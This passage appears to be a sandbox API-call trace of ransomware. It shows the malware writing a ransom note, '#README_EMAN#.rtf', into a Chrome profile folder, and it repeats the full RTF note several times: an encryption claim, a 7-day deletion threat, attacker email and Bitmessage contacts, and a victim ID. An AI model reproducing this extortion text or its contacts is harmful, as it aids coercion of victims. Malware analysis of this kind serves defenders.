t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n0>5\x1d:\x1b\x1b\x0f\x0f.%\"'$\x12\x12&'%$\x0f\x1bC3\n", lpUsedDefaultChar=0x0) returned 8717 [0208.510] WriteFile (in: hFile=0x2fc, lpBuffer=0x1f4da18*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4da18*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0208.511] CloseHandle (hObject=0x2fc) returned 1 [0208.511] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\#readme_eman#.rtf")) returned 0xffffffff [0208.511] GetLastError () returned 0x2 [0208.511] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0209.426] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0209.426] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0209.426] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 